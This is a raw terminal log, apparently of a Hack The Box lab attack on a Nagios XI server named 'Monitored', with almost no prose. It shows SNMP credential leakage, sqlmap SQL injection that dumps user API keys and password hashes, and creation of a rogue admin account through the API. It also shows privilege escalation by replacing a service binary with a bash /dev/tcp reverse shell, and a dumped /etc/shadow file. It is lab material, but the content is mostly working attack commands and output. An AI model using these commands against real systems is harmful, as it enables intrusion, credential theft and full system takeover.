┌──(kali㉿kali)-[~/Desktop/htb/Monitored]└─$ sudo nmap -sC -sV -sU -T4 -Pn 10.10.11.248[sudo] password for kali: Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-20 09:06 ESTWarning: 10.10.11.248 giving up on port because retransmission cap hit (6).Stats: 0:14:09 elapsed; 0 hosts completed (1 up), 1 undergoing UDP ScanUDP Scan Timing: About 81.30% done; ETC: 09:23 (0:03:15 remaining)Stats: 0:32:11 elapsed; 0 hosts completed (1 up), 1 undergoing Script ScanNSE Timing: About 99.91% done; ETC: 09:38 (0:00:01 remaining)Stats: 0:32:16 elapsed; 0 hosts completed (1 up), 1 undergoing Script ScanNSE Timing: About 99.91% done; ETC: 09:38 (0:00:01 remaining)Nmap scan report for nagios.monitored.htb (10.10.11.248)Host is up (0.39s latency).Not shown: 992 closed udp ports (port-unreach)PORT      STATE         SERVICE VERSION68/udp    open|filtered dhcpc123/udp   open          ntp     NTP v4 (unsynchronized)| ntp-info: |_  161/udp   open          snmp    SNMPv1 server; net-snmp SNMPv3 server (public)| snmp-interfaces: |   lo|     IP address: 127.0.0.1  Netmask: 255.0.0.0|     Type: softwareLoopback  Speed: 10 Mbps|     Traffic stats: 522.86 Kb sent, 522.86 Kb received|   VMware VMXNET3 Ethernet Controller|     IP address: 10.10.11.248  Netmask: 255.255.254.0|     MAC address: 00:50:56:b9:64:03 (VMware)|     Type: ethernetCsmacd  Speed: 4 Gbps|_    Traffic stats: 76.39 Mb sent, 51.24 Mb received| snmp-netstat: |   TCP  0.0.0.0:22           0.0.0.0:0                                                                                                                              |   TCP  0.0.0.0:389          0.0.0.0:0|   TCP  10.10.11.248:46074   10.10.16.48:7777|   TCP  10.10.11.248:49754   10.10.14.146:4444|   TCP  127.0.0.1:25         0.0.0.0:0|   TCP  127.0.0.1:3306       0.0.0.0:0|   TCP  127.0.0.1:5432       0.0.0.0:0|   TCP  127.0.0.1:7878       0.0.0.0:0|   TCP  127.0.0.1:41018      127.0.1.1:80|   TCP  127.0.0.1:41028      127.0.1.1:80|   UDP  0.0.0.0:68           *:*|   UDP  0.0.0.0:123          *:*|   UDP  0.0.0.0:161          *:*|   UDP  0.0.0.0:162          *:*|   UDP  10.10.11.248:123     *:*|_  UDP  127.0.0.1:123        *:*| snmp-processes: |   1: |     Name: systemd|     Path: /sbin/init|   2: |     Name: kthreadd|   3: |     Name: rcu_gp|   4: |     Name: rcu_par_gp|   5: |     Name: kworker/0:0-events|   6: |     Name: kworker/0:0H-events_highpri|   8: |     Name: mm_percpu_wq|   9: |     Name: rcu_tasks_rude_|   10: |     Name: rcu_tasks_trace|   11: |     Name: ksoftirqd/0|   12: |     Name: rcu_sched|   13: |     Name: migration/0|   15: |     Name: cpuhp/0|   16: |     Name: cpuhp/1|   17: |     Name: migration/1|   18: |     Name: ksoftirqd/1|   20: |     Name: kworker/1:0H-events_highpri|   23: |     Name: kdevtmpfs|   24: |     Name: netns|   25: |     Name: kauditd|   26: |     Name: khungtaskd|   27: |     Name: oom_reaper|   28: |     Name: writeback|   29: |     Name: kcompactd0|   30: |     Name: ksmd|   31: |     Name: khugepaged|   49: |     Name: kintegrityd|   50: |     Name: kblockd|   51: |     Name: blkcg_punt_bio|   52: |     Name: edac-poller|   53: |     Name: devfreq_wq|   54: |     Name: kworker/0:1H-kblockd|   56: |     Name: kswapd0|   57: |     Name: kthrotld|   58: |     Name: irq/24-pciehp|   59: |     Name: irq/25-pciehp|   60: |     Name: irq/26-pciehp|   61: |     Name: irq/27-pciehp|   62: |     Name: irq/28-pciehp|   63: |     Name: irq/29-pciehp|   64: |     Name: irq/30-pciehp|   65: |     Name: irq/31-pciehp|   66: |     Name: irq/32-pciehp|   67: |     Name: irq/33-pciehp|   68: |     Name: irq/34-pciehp|   69: |     Name: irq/35-pciehp|   70: |     Name: irq/36-pciehp|   71: |     Name: irq/37-pciehp|   72: |     Name: irq/38-pciehp|   73: |     Name: irq/39-pciehp|   74: |     Name: irq/40-pciehp|   75: |     Name: irq/41-pciehp|   76: |     Name: irq/42-pciehp|   77: |     Name: irq/43-pciehp|   78: |     Name: irq/44-pciehp|   79: |     Name: irq/45-pciehp|   80: |     Name: irq/46-pciehp|   81: |     Name: irq/47-pciehp|   82: |     Name: irq/48-pciehp|   83: |     Name: irq/49-pciehp|   84: |     Name: irq/50-pciehp|   85: |     Name: irq/51-pciehp|   86: |     Name: irq/52-pciehp|   87: |     Name: irq/53-pciehp|   88: |     Name: irq/54-pciehp|   89: |     Name: irq/55-pciehp|   90: |     Name: acpi_thermal_pm|   91: |     Name: ipv6_addrconf|   101: |     Name: kstrp|   104: |     Name: zswap-shrink|   105: |     Name: kworker/u5:0|   127: |     Name: kworker/1:1H-kblockd|   153: |     Name: mpt_poll_0|   155: |     Name: mpt/0|   156: |     Name: ata_sff|   157: |     Name: scsi_eh_0|   158: |     Name: scsi_tmf_0|   159: |     Name: scsi_eh_1|   160: |     Name: scsi_eh_2|   161: |     Name: scsi_tmf_1|   163: |     Name: scsi_tmf_2|   164: |     Name: scsi_eh_3|   165: |     Name: scsi_tmf_3|   166: |     Name: scsi_eh_4|   167: |     Name: scsi_tmf_4|   168: |     Name: scsi_eh_5|   169: |     Name: scsi_tmf_5|   170: |     Name: scsi_eh_6|   171: |     Name: scsi_tmf_6|   172: |     Name: scsi_eh_7|   173: |     Name: scsi_tmf_7|   174: |     Name: scsi_eh_8|   175: |     Name: scsi_tmf_8|   176: |     Name: scsi_eh_9|   177: |     Name: scsi_tmf_9|   178: |     Name: scsi_eh_10|   179: |     Name: scsi_tmf_10|   180: |     Name: scsi_eh_11|   181: |     Name: scsi_tmf_11|   182: |     Name: scsi_eh_12|   183: |     Name: scsi_tmf_12|   184: |     Name: scsi_eh_13|   185: |     Name: scsi_tmf_13|   186: |     Name: scsi_eh_14|   187: |     Name: scsi_tmf_14|   188: |     Name: scsi_eh_15|   189: |     Name: scsi_tmf_15|   190: |     Name: scsi_eh_16|   191: |     Name: scsi_tmf_16|   192: |     Name: scsi_eh_17|   193: |     Name: scsi_tmf_17|   194: |     Name: scsi_eh_18|   195: |     Name: scsi_tmf_18|   196: |     Name: scsi_eh_19|   197: |     Name: scsi_tmf_19|   198: |     Name: scsi_eh_20|   199: |     Name: scsi_tmf_20|   200: |     Name: scsi_eh_21|   201: |     Name: scsi_tmf_21|   202: |     Name: scsi_eh_22|   203: |     Name: scsi_tmf_22|   204: |     Name: scsi_eh_23|   205: |     Name: scsi_tmf_23|   206: |     Name: scsi_eh_24|   207: |     Name: scsi_tmf_24|   208: |     Name: scsi_eh_25|   209: |     Name: scsi_tmf_25|   210: |     Name: scsi_eh_26|   211: |     Name: scsi_tmf_26|   212: |     Name: scsi_eh_27|   213: |     Name: scsi_tmf_27|   214: |     Name: scsi_eh_28|   215: |     Name: scsi_tmf_28|   216: |     Name: scsi_eh_29|   217: |     Name: scsi_tmf_29|   218: |     Name: scsi_eh_30|   219: |     Name: scsi_tmf_30|   220: |     Name: scsi_eh_31|   221: |     Name: scsi_tmf_31|   249: |     Name: kworker/u4:30-ext4-rsv-conversion|   250: |     Name: kworker/u4:31-ext4-rsv-conversion|   252: |     Name: scsi_eh_32|   253: |     Name: scsi_tmf_32|   284: |     Name: jbd2/sda1-8|   285: |     Name: ext4-rsv-conver|   323: |     Name: systemd-journal|     Path: /lib/systemd/systemd-journald|   346: |     Name: systemd-udevd|     Path: /lib/systemd/systemd-udevd|   391: |     Name: irq/16-vmwgfx|   393: |     Name: ttm_swap|   394: |     Name: cryptd|   395: |     Name: card0-crtc0|   398: |     Name: card0-crtc1|   399: |     Name: card0-crtc2|   401: |     Name: card0-crtc3|   403: |     Name: card0-crtc4|   405: |     Name: card0-crtc5|   407: |     Name: card0-crtc6|   409: |     Name: card0-crtc7|   422: |     Name: VGAuthService|     Path: /usr/bin/VGAuthService|   424: |     Name: vmtoolsd|     Path: /usr/bin/vmtoolsd|   446: |     Name: auditd|     Path: /sbin/auditd|   458: |     Name: laurel|     Path: /usr/local/sbin/laurel|     Params: --config /etc/laurel/config.toml|   463: |     Name: kworker/1:3-events|   517: |     Name: audit_prune_tre|   543: |     Name: hwmon1|   551: |     Name: cron|     Path: /usr/sbin/cron|     Params: -f|   552: |     Name: dbus-daemon|     Path: /usr/bin/dbus-daemon|     Params: --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only|   554: |     Name: rsyslogd|     Path: /usr/sbin/rsyslogd|     Params: -n -iNONE|   556: |     Name: systemd-logind|     Path: /lib/systemd/systemd-logind|   558: |     Name: wpa_supplicant|     Path: /sbin/wpa_supplicant|     Params: -u -s -O /run/wpa_supplicant|   561: |     Name: cron|     Path: /usr/sbin/CRON|     Params: -f|   591: |     Name: sh|     Path: /bin/sh|     Params: -c sleep 30; sudo -u svc /bin/bash -c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB |   646: |     Name: dhclient|     Path: /sbin/dhclient|     Params: -4 -v -i -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0|   716: |     Name: avahi-autoipd|     Path: avahi-autoipd: [eth0] sleeping|   717: |     Name: avahi-autoipd|     Path: avahi-autoipd: [eth0] callout dispatcher|   768: |     Name: snmptrapd|     Path: /usr/sbin/snmptrapd|     Params: -LOw -f -p /run/snmptrapd.pid|   788: |     Name: snmpd|     Path: /usr/sbin/snmpd|     Params: -LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid|   791: |     Name: ntpd|     Path: /usr/sbin/ntpd|     Params: -p /var/run/ntpd.pid -g -u 108:116|   800: |     Name: agetty|     Path: /sbin/agetty|     Params: -o -p -- u --noclear tty1 linux|   806: |     Name: sshd|     Path: sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups|   852: |     Name: shellinaboxd|     Path: /usr/bin/shellinaboxd|     Params: -q --background=/var/run/shellinaboxd.pid -c /var/lib/shellinabox -p 7878 -u shellinabox -g shellinabox --user-css Black on Whit|   855: |     Name: shellinaboxd|     Path: /usr/bin/shellinaboxd|     Params: -q --background=/var/run/shellinaboxd.pid -c /var/lib/shellinabox -p 7878 -u shellinabox -g shellinabox --user-css Black on Whit|   856: |     Name: slapd|     Path: /usr/sbin/slapd|     Params: -h ldap:/// ldapi:/// -g openldap -u openldap -F /etc/ldap/slapd.d|   866: |     Name: apache2|     Path: /usr/sbin/apache2|     Params: -k start|   878: |     Name: postgres|     Path: /usr/lib/postgresql/13/bin/postgres|     Params: -D /var/lib/postgresql/13/main -c config_file=/etc/postgresql/13/main/postgresql.conf|   901: |     Name: postgres|     Path: postgres: 13/main: checkpointer |   902: |     Name: postgres|     Path: postgres: 13/main: background writer |   903: |     Name: postgres|     Path: postgres: 13/main: walwriter |   904: |     Name: postgres|     Path: postgres: 13/main: autovacuum launcher |   905: |     Name: postgres|     Path: postgres: 13/main: stats collector |   906: |     Name: postgres|     Path: postgres: 13/main: logical replication launcher |   939: |     Name: mariadbd|     Path: /usr/sbin/mariadbd|   993: |     Name: snmptt|     Path: /usr/bin/perl|     Params: /usr/sbin/snmptt --daemon|   995: |     Name: snmptt|     Path: /usr/bin/perl|     Params: /usr/sbin/snmptt --daemon|   1033: |     Name: xinetd|     Path: /usr/sbin/xinetd|     Params: -pidfile /run/xinetd.pid -stayalive -inetd_compat -inetd_ipv6|   1552: |     Name: sudo|     Path: sudo|     Params: -u svc /bin/bash -c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB|   1553: |     Name: bash|     Path: /bin/bash|     Params: -c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB|   1596: |     Name: exim4|     Path: /usr/sbin/exim4|     Params: -bd -q30m|   3687: |     Name: cron|     Path: /usr/sbin/CRON|     Params: -f|   3688: |     Name: sh|     Path: /bin/sh|     Params: -c /usr/bin/php -q /usr/local/nagiosxi/cron/cmdsubsys.php >> /usr/local/nagiosxi/var/cmdsubsys.log 2>&1|   3689: |     Name: php|     Path: /usr/bin/php|     Params: -q /usr/local/nagiosxi/cron/cmdsubsys.php|   3694: |     Name: sh|     Path: sh|     Params: -c bash -c 'bash -i >& /dev/tcp/10.10.14.146/4444 0>&1'|   3695: |     Name: bash|     Path: bash|     Params: -c bash -i >& /dev/tcp/10.10.14.146/4444 0>&1|   3696: |     Name: bash|     Path: bash|     Params: -i|   3718: |     Name: python3|     Path: python3|     Params: -c import pty; pty.spawn("/bin/bash")|   3719: |     Name: bash|     Path: /bin/bash|   4135: |   4578: |     Name: kworker/0:1-cgroup_destroy|   4767: |     Name: kworker/u4:0-flush-8:0|   4982: |     Name: cron|     Path: /usr/sbin/CRON|     Params: -f|   4983: |     Name: sh|     Path: /bin/sh|     Params: -c /usr/bin/php -q /usr/local/nagiosxi/cron/cmdsubsys.php >> /usr/local/nagiosxi/var/cmdsubsys.log 2>&1|   4984: |     Name: php|     Path: /usr/bin/php|     Params: -q /usr/local/nagiosxi/cron/cmdsubsys.php|   5094: |     Name: sh|     Path: sh|     Params: -c bash -c 'bash -i >&/dev/tcp/10.10.16.48/7777 0>&1'|   5095: |     Name: bash|     Path: bash|     Params: -c bash -i >&/dev/tcp/10.10.16.48/7777 0>&1|   5096: |     Name: bash|     Path: bash|     Params: -i|   5232: |     Name: kworker/1:0-events|   5312: |     Name: kworker/0:2-events|   5316: |   5341: |   5346: |   5349: |   5352: |   5363: |     Name: apache2|     Path: /usr/sbin/apache2|   5364: |   5371: |     Name: apache2|     Path: /usr/sbin/apache2|   5373: |   5379: |   5380: |   5381: |   5383: |   5384: |   5385: |   5387: |   5396: |   5397: |     Name: cron|   5398: |     Name: sh|   5399: |     Name: php|   5400: |   5401: |   5404: |     Name: sh|   5405: |     Name: bash|   5406: |     Name: bash|   5408: |   5411: |   5412: |   5413: |     Name: apache2|     Path: /usr/sbin/apache2|     Params: -k start|_  5414: | snmp-sysdescr: Linux monitored 5.10.0-27-amd64 #1 SMP Debian 5.10.205-2 (2023-12-31) x86_64|_  System uptime: 31m38.33s (189833 timeticks)| snmp-win32-software: |   略| snmp-info: |   enterprise: net-snmp|   engineIDFormat: unknown|   engineIDData: 6f3fa7421af94c6500000000|   snmpEngineBoots: 35|_  snmpEngineTime: 31m38s162/udp   open          snmp    net-snmp; net-snmp SNMPv3 server| snmp-info: |   enterprise: net-snmp|   engineIDFormat: unknown|   engineIDData: 5a44ab2146ff4c6500000000|   snmpEngineBoots: 26|_  snmpEngineTime: 31m38s402/udp   open|filtered genie17673/udp open|filtered unknown18373/udp open|filtered unknown29243/udp open|filtered unknownService Info: Host: monitoredHost script results:|_clock-skew: 4sService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 2945.50 seconds

┌──(kali㉿kali)-[~/Desktop/htb/Monitored]└─$ ldapsearch -x -H ldap://monitored.htb  -b "DC=monitored,DC=htb"# extended LDIF## LDAPv3# base <DC=monitored,DC=htb> with scope subtree# filter: (objectclass=*)# requesting: ALL## monitored.htbdn: dc=monitored,dc=htbobjectClass: topobjectClass: dcObjectobjectClass: organizationo: monitored.htbdc: monitored# search resultsearch: 2result: 0 Success# numResponses: 2# numEntries: 1

snmpwalk -v2c -c public monitored.htbsvc XjH7VCehowpR1xZB

┌──(root㉿kali)-[/home/kali/Desktop/htb/Monitored]└─# curl -POST -k 'https://nagios.monitored.htb/nagiosxi/api/v1/authenticate' -d 'username=svc&password=XjH7VCehowpR1xZB&valid_min=500'{"username":"svc","user_id":"2","auth_token":"37d33a2be847fa499528a908aa4d165cdf5f7fde","valid_min":500,"valid_until":"Sat, 20 Jan 2024 17:48:41 -0500"}

sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=37d33a2be847fa499528a908aa4d165cdf5f7fde" --level 5 --risk 3 -p id --batch最后慢慢注入库表字段后dumpsqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ksX POST https://nagios.monitored.htb/nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=500" | awk -F'"' '{print$12}'`" --level 5 --risk 3 -p id --batch -D nagiosxi -T xi_users --dump

Database: nagiosxiTable: xi_users[8 entries]+---------+------------------------+----------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+-------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+| user_id | email                  | name                 | api_key                                                          | enabled | password                                                     | username    | created_by | last_login | api_enabled | last_edited | created_time | last_attempt | backend_ticket                                                   | last_edited_by | login_attempts | last_password_change |+---------+------------------------+----------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+-------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+| 1       | [email protected]    | Nagios Administrator | IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL | 1       | $2a$10$825c1eec29c150b118fe7unSfxq80cf7tHwC0J0BG2qZiNzWRUx2C | nagiosadmin | 0          | 1701931372 | 1           | 1701427555  | 0            | 0            | IoAaeXNLvtDkH5PaGqV2XZ3vMZJLMDR0                                 | 5              | 0              | 1701427555           || 2       | [email protected]      | svc                  | 2huuT2u2QIPqFuJHnkPEEuibGJaJIcHCFDpDb29qSFVlbdO4HJkjfg2VpDNE3PEK | 0       | $2a$10$12edac88347093fcfd392Oun0w66aoRVCrKMPBydaUfgsgAOUHSbK | svc         | 1          | 1699724476 | 1           | 1699728200  | 1699634403   | 1705760765   | 6oWBPbarHY4vejimmu3K8tpZBNrdHpDgdUEs5P2PFZYpXSuIdrRMYgk66A0cjNjq | 1              | 7              | 1699697433           || 6       | [email protected]   | opcode               | Ou33MAj0IfCIJg3iHOLY0rnKIgCj49loAL2RljN8neqORlheNJWYK0OiuqqhXO4f | 1       | $2a$10$b43fe283c318f646849d8uAujK14jfDD0xqBFR05Xt2lvX1al5m6u | opcode      | 0          | 1705758991 | 0           | 0           | 0            | 0            | peJDmtr59inAnK3BYveojo8tAAVUY7pTNdQ7ghKLMd46eDYbksP2KfKtWi2jmUMg | 0              | 0              | 1705759009           || 7       | [email protected] | gage                 | 5HHXHqKnhAZTv4cmv8nALgZNrm59k8eVeE7M8j4NPH3eAFfVheYps3OTJKeci8GE | 1       | $2a$10$593e290d91b0b351ec413uLOXA7HHETzepbggKDRsCNlhkQ8/Fyu6 | caixukun    | 0          | 1705759068 | 0           | 0           | 0            | 1705759323   | mlfjjUVpKgmYOKi2g7UHPf7NRse6cGtFeI4FKbusEAZiaTCDUdiPeWnYJEXJjua8 | 0              | 1              | 1705759127           || 8       | [email protected]   | xyzxyz               | 6lKRku0Nr54gZdLOgKUqGT5Mdb2Aj0pmsSu03AOO0VUqbroBMeqMYLR4kj6Hhoko | 1       | $2a$10$365df3d40687ff5fbc032uHet20Fjzb.vlnMuSgvoU2tFmzCMTUOq | xyzxyz      | 0          | 1705759430 | 0           | 0           | 0            | 0            | JbdSTls6XhslQnirqE2KQtAPV9D92QIPuumiqBJhbJhakkWdjg8qH9H53TufqLuM | 0              | 0              | 1705759453           || 9       | [email protected]         | admin                | 4ErhsgfjJQCZJaE8lk0UsNTbcoOnQvAnBQGYfVIqq5jhbGmtqDcDfgC56oVLeFTA | 1       | $2a$10$47b968ae15ea823bd821buBL6rwR20PYKHUEB8/NAdbsAUDT.rVT2 | admin       | 0          | 1705760553 | 0           | 0           | 0            | 0            | DHkQ9rfItbfuBAhErGcKkS5ebfuqcE9KsbPHPHdrch3ifOA2QTZbI56UNXv3pSvq | 0              | 0              | 1705760617           || 10      | admin111@localhost     | Admin111             | ZLA8L2tecJNFm8BCuZhl9DrGoopfnLPkEYXLWFqIBdNFou5h7vcqnOvopDXaMpQt | 1       | $2a$10$e26442a9d958ed79c4dbfeMqqnMpqAqLoYEfuLZ6mHYFN1a7OLeMu | admin111    | 0          | 1705761352 | 0           | 0           | 0            | 0            | EtleX3SAUMa2e2IdKu2glhnXh93JtUvqr8K3UCYehJ3WvBgMhWkOBPOGub98FmdP | 0              | 0              | 1705761394           || 11      | [email protected]   | geqian               | XX0FrT4mKl0KcOIAAC6IilZCJkrqEkGag5rLIsUZ0YqSFC8LRDF8bP0qgRdPlQ5r | 1       | $2a$10$f5149f642d681ab41e09euzmac61tKRbKM4sVRlsLajUbJgvRDljG | geqian      | 0          | 1705761542 | 0           | 0           | 0            | 0            | akv9G37D9PH4BZ4GnHG2FlVKo3oJF76La586sjZtqqWmDejvp2H4l7v0iUEHXrVq | 0              | 0              | 1705761615           |+---------+------------------------+----------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+-------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+[10:02:33] [INFO] table 'nagiosxi.xi_users' dumped to CSV file '/root/.local/share/sqlmap/output/nagios.monitored.htb/dump/nagiosxi/xi_users.csv'[10:02:33] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/nagios.monitored.htb'[*] ending @ 10:02:33 /2024-01-20/

┌──(kali㉿kali)-[~/Desktop/htb/Monitored]└─$ curl -POST -k "https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1" -d "username=geqian&password=geqian&name=geqian&[email protected]&auth_level=admin"{    "success": "User account geqian was added successfully!",    "user_id": 11}

nagios@monitored:~$ sudo -lsudo -lMatching Defaults entries for nagios on localhost:    env_reset, mail_badpass,    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binUser nagios may run the following commands on localhost:    (root) NOPASSWD: /etc/init.d/nagios start    (root) NOPASSWD: /etc/init.d/nagios stop    (root) NOPASSWD: /etc/init.d/nagios restart    (root) NOPASSWD: /etc/init.d/nagios reload    (root) NOPASSWD: /etc/init.d/nagios status    (root) NOPASSWD: /etc/init.d/nagios checkconfig    (root) NOPASSWD: /etc/init.d/npcd start    (root) NOPASSWD: /etc/init.d/npcd stop    (root) NOPASSWD: /etc/init.d/npcd restart    (root) NOPASSWD: /etc/init.d/npcd reload    (root) NOPASSWD: /etc/init.d/npcd status    (root) NOPASSWD: /usr/bin/php        /usr/local/nagiosxi/scripts/components/autodiscover_new.php *    (root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/send_to_nls.php *    (root) NOPASSWD: /usr/bin/php        /usr/local/nagiosxi/scripts/migrate/migrate.php *    (root) NOPASSWD: /usr/local/nagiosxi/scripts/components/getprofile.sh    (root) NOPASSWD: /usr/local/nagiosxi/scripts/upgrade_to_latest.sh    (root) NOPASSWD: /usr/local/nagiosxi/scripts/change_timezone.sh    (root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_services.sh *    (root) NOPASSWD: /usr/local/nagiosxi/scripts/reset_config_perms.sh    (root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_ssl_config.sh *    (root) NOPASSWD: /usr/local/nagiosxi/scripts/backup_xi.sh *

nagios@monitored:~$ rm /usr/local/nagios/bin/npcdnagios@monitored:~$ vi /usr/local/nagios/bin/npcdnagios@monitored:~$ chmod 777 /usr/local/nagios/bin/npcdnagios@monitored:/usr/local/nagios/bin$ cat /usr/local/nagios/bin/npcd#!/bin/bashbash -i >& /dev/tcp/10.10.14.64/5555 0>&1sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcdsudo /usr/local/nagiosxi/scripts/manage_services.sh restart np

root:$y$j9T$LLy.W6CI0K6McgXMKio0i1$1omBVYjsg.8qEzyjkL.3kXtpAMZNc7x9CMwOnrwltJ8:19671:0:99999:7:::daemon:*:19670:0:99999:7:::bin:*:19670:0:99999:7:::sys:*:19670:0:99999:7:::sync:*:19670:0:99999:7:::games:*:19670:0:99999:7:::man:*:19670:0:99999:7:::lp:*:19670:0:99999:7:::mail:*:19670:0:99999:7:::news:*:19670:0:99999:7:::uucp:*:19670:0:99999:7:::proxy:*:19670:0:99999:7:::www-data:*:19670:0:99999:7:::backup:*:19670:0:99999:7:::list:*:19670:0:99999:7:::irc:*:19670:0:99999:7:::gnats:*:19670:0:99999:7:::nobody:*:19670:0:99999:7:::_apt:*:19670:0:99999:7:::systemd-network:*:19670:0:99999:7:::systemd-resolve:*:19670:0:99999:7:::messagebus:*:19670:0:99999:7:::systemd-timesync:*:19670:0:99999:7:::avahi-autoipd:*:19670:0:99999:7:::sshd:*:19670:0:99999:7:::svc:$y$j9T$JKvaJakBax4xU3.kZFe221$D2o.A3O6EXWgKPzpD8Gky7cPbXZ/a9Ey/9/OM1AoE80:19671:0:99999:7:::systemd-coredump:!*:19670::::::mysql:!:19670:0:99999:7:::ntp:*:19670:0:99999:7:::postgres:*:19670:0:99999:7:::Debian-exim:!:19670:0:99999:7:::uuidd:*:19670:0:99999:7:::openldap:!:19670:0:99999:7:::Debian-snmp:!:19670:0:99999:7:::snmptt:*:19670:0:99999:7:::shellinabox:*:19670:0:99999:7:::nagios:$y$j9T$EnaS672RtIQB0i6zh.ooO/$gkWPA1PKoIQH.ACc6NVntLPY9x55i08J4S6c1Rpvqn.:19671:0:99999:7:::_laurel:!:19698::::::